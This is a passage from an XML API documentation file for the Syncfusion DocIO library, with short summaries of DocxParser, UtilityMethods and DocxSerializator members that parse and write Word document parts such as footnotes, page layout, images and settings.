            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteProp(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parses the footnote and endnote property.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">Boolean value specifies whether the element is Footnote or Endnote.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumberStart(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parses the footnote endnote number start.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003FootnoteNumFormat(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parses the 2003 footnote endnote number format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumFormat(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parses the footnote endnote number format.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFootnoteNumRestart(System.Xml.XmlReader,System.Boolean)">
            <summary>
            Parses the footnote endnote number restart.
            </summary>
            <param name="reader">The reader.</param>
            <param name="isFootnote">if it is footnote, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003PageNumberStyle(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parse 2003 Page Number Style
            </summary>
            <param name="section"></param>
            <param name="numberType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003ChapterNumberSeparator(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parse 2003 Chapter Number separator
            </summary>
            <param name="section"></param>
            <param name="chapterNumberSeprator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseChapterNumberSeparator(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parse Chapter Number separator
            </summary>
            <param name="section"></param>
            <param name="chapterNumberSeprator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePageNumberStyle(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parse Page Number Style
            </summary>
            <param name="section"></param>
            <param name="numberType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePageNumberType(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the type and number start of the page.
            </summary>
            <param name="sec">The sec.</param>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003TextDirection(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parse 2003 Text flow direction
            </summary>
            <param name="reader">The reader</param>
            <param name="ent">The ent</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseTextDirection(System.Xml.XmlReader,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Parses the text direction.
            </summary>
            <param name="reader">The reader.</param>
            <param name="ent">The ent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseLineNumbering(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the line numbering.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVertAlign(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parse the vertical alignment of the page.
            </summary>
            <param name="reader">The reader</param>
            <param name="sec">The section</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseGrid(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the grid.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePageBorders(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the page borders.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColumns(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the columns.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The sec.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseEqualColumns(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection,System.Int32)">
            <summary>
            Parses the equal column.
            </summary>
            <param name="sec">The sec.</param>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseColumn(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection,System.Int32)">
            <summary>
            Parses the column.
            </summary>
            <param name="reader">The reader.</param>
            <param name="ent">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePageMargins(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the page margins.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetMarginValue(System.Xml.XmlReader,System.String)">
            <summary>
            Gets the margin value.
            </summary>
            <param name="reader">The reader.</param>
            <param name="attrName">Name of the attribute.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParsePageSize(System.Xml.XmlReader,Syncfusion.DocIO.DLS.WSection)">
            <summary>
            Parses the size of the page.
            </summary>
            <param name="reader">The reader.</param>
            <param name="sec">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetPageSize(System.String)">
            <summary>
            Parses the size of the page.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSectionBreakType(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parses the type of the section.
            </summary>
            <param name="sec">The sec.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Parse2003SectionBreakType(Syncfusion.DocIO.DLS.WSection,System.String)">
            <summary>
            Parses the type of the section.
            </summary>
            <param name="sec">The sec.</param>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseSettingsRelations(System.IO.Stream)">
            <summary>
            Parses the settings relations.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.InitializeCompactSettings">
            <summary>
            Initialize word 2010 specific Compatiblity Settings
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCompatibiltyOption(System.Xml.XmlReader)">
            <summary>
            Parses the Compatibilty Option.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCompatNode(System.Xml.XmlReader)">
            <summary>
            Parses the compat Node.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseWord2003CompatNode(System.Xml.XmlReader)">
            <summary>
            Parses the compat Node of Word 2003 XML.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseCompatSettingNode(System.Xml.XmlReader)">
            <summary>
            Parses the CompatSetting Node.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseVariables(System.Xml.XmlReader)">
            <summary>
            Parses the document variables.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseString(System.String)">
            <summary>
            replaces hexadecimal values with equivalent string
            </summary>
            <param name="text">Text</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseProtectType(System.Xml.XmlReader)">
            <summary>
            Parses the type of the protect.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseViewType(System.Xml.XmlReader)">
            <summary>
            Parses the view type.
            </summary>
            <param name="reader">The reader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddItem(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Adds the item.
            </summary>
            <param name="item">The item.</param>
            <param name="para">The para.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddToParagraph(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Adds to paragraph.
            </summary>
            <param name="item">The item.</param>
            <param name="para">The para.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.AddOleObject(Syncfusion.DocIO.DLS.WOleObject,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Adds the OLE object.
            </summary>
            <param name="oleObject">The OLE object.</param>
            <param name="para">The para.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetImageName(System.String,System.Boolean,System.Boolean)">
            <summary>
            Gets the image id.
            </summary>
            <param name="imageId">The image id.</param>
            <param name="isHeaderFooter">if set to <c>true</c> [is header footer].</param>
            <param name="isPicBullet">if set to <c>true</c> [is pic bullet].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.LoadImage(Syncfusion.DocIO.DLS.WPicture,System.String,System.Boolean,System.Boolean)">
            <summary>
            Loads the image data.
            </summary>
            <param name="picture">The picture.</param>
            <param name="imageRelId">The image relation id.</param>
            <param name="isHeaderFooter">if set to <c>true</c> [is header footer].</param>
            <param name="isPicBullet">if set to <c>true</c> [is picture bullet].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetImageBytes(System.String)">
            <summary>
            Gets the image bytes.
            </summary>
            <param name="imageName">Name of the image.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetLinkedImageBytes(System.String,System.Boolean,System.Boolean)">
            <summary>
            Gets the image.
            </summary>
            <param name="imageId">The image id.</param>
            <param name="isHeaderFooter">if it is a header/footer, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBytesFrom(Syncfusion.DocIO.DLS.Part)">
            <summary>
            Gets the bytes from.
            </summary>
            <param name="part">The part.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.FindPart(System.String,System.String)">
            <summary>
            Finds the part.
            </summary>
            <param name="partContainer">The part container.</param>
            <param name="partName">Name of the part.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFileRelations(System.String)">
            <summary>
            Gets the HF relation.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ParseFloatVal(System.String)">
            <summary>
            Parses the float val.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBooleanValue(System.Xml.XmlReader)">
            <summary>
            Returns the boolean value from the current node
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetCompatibilityMode(System.Xml.XmlReader)">
            <summary>
            Returns the boolean value from the current node
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetBooleanValue(System.Xml.XmlReader,System.String)">
            <summary>
            Gets the boolean value from the current node.
            </summary>
            <param name="reader">The reader.</param>
            <param name="nameSpace">The name space.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetReaderElementValue(System.Xml.XmlReader)">
            <summary>
            Returns xml element value.
            </summary>
            <param name="reader">XmlReader to get value from.</param>
            <returns>Xml element value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetColorValue(System.String)">
            <summary>
            Parses the color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetGradientColor(System.String)">
            <summary>
            Gets the color of the gradient.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetHexColor(System.String)">
            <summary>
            Gets the hexadecimal color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetHtmlColor(System.String)">
            <summary>
            Gets the HTML color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.GetFloatValue(System.Xml.XmlReader,System.String,System.String)">
            <summary>
            Gets the float value from element attribute.
            </summary>
            <param name="reader">The reader.</param>
            <param name="attrName">Name of the attr.</param>
            <param name="attrNS">The attr NS.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.ReadSingleNodeIntoStream(System.Xml.XmlReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.SkipWhitespaces(System.Xml.XmlReader)">
            <summary>
            Skip whitespaces and moves the reader to the next node.
            </summary>
            <param name="reader">The xml reader</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.DocxParser.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.ChartRelations">
            <summary>
            Gets the chart relations
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsInFootnote">
            <summary>
            Gets/sets the value indicating whether the chart is in footnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsInEndnote">
            <summary>
            Gets/sets the value indicating whether the chart is in endnote
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsInComments">
            <summary>
            Gets/sets the value indicating whether the chart is in comments
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsWord2003ML">
            <summary>
            Gets/Sets the value indicating whether the document is Word 2003 ML.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.ImageIds">
            <summary>
            Gets the image ids.
            </summary>
            <value>The image ids.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.Comments">
            <summary>
            Gets the comment collection.
            </summary>
            <value>The comment stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.BookMarkCollection">
            <summary>
            Gets the bookmark start and end if it preserve after the Paragraph/Table/Cell/Row end mark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.CommentsStack">
            <summary>
            Gets the comments stack.
            </summary>
            <value>The comments stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.CurrentComment">
            <summary>
            Gets the current comment.
            </summary>
            <value>The current comment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.FieldStack">
            <summary>
            Gets the field stack.
            </summary>
            <value>The field stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.CurrentField">
            <summary>
            Gets the current field.
            </summary>
            <value>The current field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.Footnote">
            <summary>
            Gets the footnote by id.
            </summary>
            <value>The footnote.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.Endnote">
            <summary>
            Gets the endnote by id.
            </summary>
            <value>The endnote.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.OverrideListStyleNames">
            <summary>
            Gets the collection of override list style names.
            </summary>
            <value>The over list style names.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.AbstractListStyleNames">
            <summary>
            Gets the abstract list styles.
            </summary>
            <value>The abstract list styles.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.PictureBullet">
            <summary>
            Gets the collection of picture bullet.
            </summary>
            <value>The picture bullet.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.DocumentRelations">
            <summary>
            Gets the collection of document relations.
            </summary>
            <value>The document relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.FontTableRelations">
            <summary>
            Gets the collection of font table relations.
            </summary>
            <value>The font table relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.SettingsRelations">
            <summary>
            Gets the settings relations.
            </summary>
            <value>The settings relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsExternalHyperlink">
            <summary>
            Represents the external hyperlink
            </summary>
            <value></value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.BookmarkNames">
            <summary>
            Gets the bookmark names collection.
            </summary>
            <value>The name of the bookmark.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.HFRelations">
            <summary>
            Represents the HeaderFooter relations.
            </summary>
            <value>The headers footers rel.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.BaseStyleNames">
            <summary>
            Gets the collection of base style names.
            </summary>
            <value>The base style names.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.StyleNameId">
            <summary>
            Gets the collection of style name and id.
            </summary>
            <value>The style name id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.LinkStyleNames">
            <summary>
            Gets the link style names.
            </summary>
            <value>The link style names.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.AppVersion">
            <summary>
            Gets the AppVersion.
            </summary>
            <value>The AppVersion.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.AutoShapeHelper">
            <summary>
            Gets the auto shape helper.
            </summary>
            <value>
            The auto shape helper.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsSDTHasSectionBreak">
            <summary>
             Gets/sets the value indicates whether the SDTContent has section break
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsRowChangeFormat">
            <summary>
            Gets/sets the value indicates whether is row change format
            </summary>
            <value>
            <c>true</c>if it is row change format, else<c>false</c>
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsCellChangeFormat">
            <summary>
            Gets/sets the value indicates whether is cell change format
            </summary>
            <value>
            <c>true</c>if it is cell change format, else<c>false</c>
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsTableChangeFormat">
            <summary>
            Gets/sets the value indicates whether is cell change format
            </summary>
            <value>
            <c>true</c>if it is cell change format, else<c>false</c>
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsHyperLinkField">
            <summary>
            Gets/sets the value indicates whether it is hyperlink field
            </summary>
            <value>
            <c>true</c>if it is hyperlink field, else<c>false</c>
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsPreviousItemFieldStart">
            <summary>
            Gets/sets the value indicates whether it is previous item field start
            </summary>
            <value>
            <c>true</c>if it is previous item field start, else<c>false</c>
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.DocxParser.IsFirstInvalidNumID">
            <summary>
            Gets/Sets the value indicates whether it is first invalid numID
            </summary>
            <value>
            <c>true</c>if it is first invalid numId in the document, else <c>false</c>
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.DocxParser.BookmarkInfo.bookmarkId">
            <summary>
            Bookmark Id
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.DocxParser.BookmarkInfo.bookmarName">
            <summary>
            Bookmark name
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.UtilityMethods">
            <summary>
            This class has few utility methods
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.ConvertNumberToDateTime(System.Double)">
            <summary>
            Converts number into DateTime.
            </summary>
            <param name="dNumber">Number to convert.</param>
            <returns>Converted value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CopyStreamTo(System.IO.Stream,System.IO.Stream)">
            <summary>
            Copies one stream into another.
            </summary>
            <param name="source">Source stream to copy from.</param>
            <param name="destination">Destination stream to copy into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CloneStream(System.IO.Stream)">
            <summary>
            Creates copy of the MemoryStream.
            </summary>
            <param name="source">Source stream to copy.</param>
            <returns>A copy of the original MemoryStream.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CreateReader(System.IO.Stream,System.Boolean)">
            <summary>
            Creates xml reader to read data from the stream.
            </summary>
            <param name="data">Data to read.</param>
            <returns>Created xml reader.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CreateReader(System.IO.Stream)">
            <summary>
            Creates xml reader to read data from the stream.
            </summary>
            <param name="data">Data to read.</param>
            <returns>Created xml reader.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CreateWriter(System.IO.Stream,System.Text.Encoding)">
            <summary>
            Creates xml writer to read data from the stream.
            </summary>
            <param name="data">Data to read.</param>
            <returns>Created xml writer.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CreateWriter(System.IO.TextWriter)">
            <summary>
            Creates xml writer to read data from the stream.
            </summary>
            <param name="data">Data to read.</param>
            <returns>Created xml writer.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.UtilityMethods.CreateWriter(System.IO.TextWriter,System.Boolean)">
            <summary>
            Creates xml writer to read data from the stream.
            </summary>
            <param name="data">Data to read.</param>
            <returns>Created xml writer.</returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.ShapeType">
            <summary>
            Represents the ShapeType
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Convertors.TrackChangeType">
            <summary>
            Represents the Track change type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.TrackChangeType.None">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.TrackChangeType.IsDelete">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Convertors.TrackChangeType.IsInsert">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocxSerializator">
            <summary>
            Represents the document serializator specific for Word 2010 format
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocxSerializator.IsParagraphContainsCnfStyle">
            <summary>
            Specifies boolean value indicating whether to Serialize "cnfStyle" element for paragraph or not.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.#ctor">
            <summary>
            Initializes a new instance of the <see cref="!:Word2010Serializator"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.Serialize(System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Saves the word document
            </summary>
            <param name="fileName">Name of the file/document</param>
            <param name="document">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordML(System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Serialize Word 2007 XML document
            </summary>
            <param name="fileName">Name of the file/document</param>
            <param name="document">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordML(System.IO.Stream,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Serialize Word 2007 XML document
            </summary>
            <param name="stream">stream to save</param>
            <param name="document">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordML(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Saves the word document in the stream
            </summary>
            <param name="document">Instance of WordDocument</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLDocument">
            <summary>
            Saves the Word 2007 XML format document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLDiagrams(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Serialize WordML ActiveX part
            </summary>
            <param name="package">The package</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLActiveXControl(Syncfusion.DocIO.DLS.Package)">
            <summary>
            Serialize WordML ActiveX part
            </summary>
            <param name="package">The package</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLCustomXMLContainer(Syncfusion.DocIO.DLS.PartContainer)">
            <summary>
            Serialize Word ML Custom xml part
            </summary>
            <param name="customXMLContainer">The customXMLContainer</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLChart(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.WChart})">
            <summary>
            Serialize Word ML charts
            </summary>
            <param name="Charts">The Charts</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLChartElements(Syncfusion.DocIO.DLS.WChart,System.String)">
            <summary>
            To Serialize chart elements
            </summary>
            <param name="chart">The Chart</param>
            <param name="id">string id</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLChartElementRelations(System.Collections.Generic.Dictionary{System.String,System.Collections.DictionaryEntry},System.String)">
            <summary>
            Serialize relations of chart
            </summary>
            <param name="relations">The relations</param>
            <param name="OccurrenceOfChart">The OccurenceOfChart</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLOleContainer(System.Collections.Generic.Dictionary{System.String,System.IO.Stream})">
            <summary>
            Serialize Word ML OleObjects binary data
            </summary>
            <param name="oleContainers">The oleContainers</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLImages(System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.DLS.ImageRecord})">
            <summary>
            Serialize Word ML Images binary data
            </summary>
            <param name="imageCollection">The imageCollection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLGeneralRelation">
            <summary>
            Serialize Word XML .rels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLDocumentRelation">
            <summary>
            Serialize Word document XML .rels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLThemes">
            <summary>
            Serialize Word document XML theme1.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLSettings">
            <summary>
            Serialize Word document XML settings.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLNumberingsRelation">
            <summary>
            Serialize Word document XML _rels/numberings.xml.rels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLFontRelation(System.IO.Stream,System.Collections.Generic.Dictionary{System.String,System.String})">
            <summary>
            Serialize Word document XML _rels/settings.xml.rels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLSettingsRelation">
            <summary>
            Serialize Word document XML _rels/settings.xml.rels
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLStyles">
            <summary>
            Serialize Word document XML settings.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLCustomProperties">
            <summary>
            Serialize Word XML custom.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLNumberings">
            <summary>
            Serialize Word document XML settings.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLFontTable">
            <summary>
            Serialize Word document XML fontTable.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLAppProperties">
            <summary>
            Serialize Word document XML app.xml
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocxSerializator.SerializeWordMLCoreProperties">
            <summary>
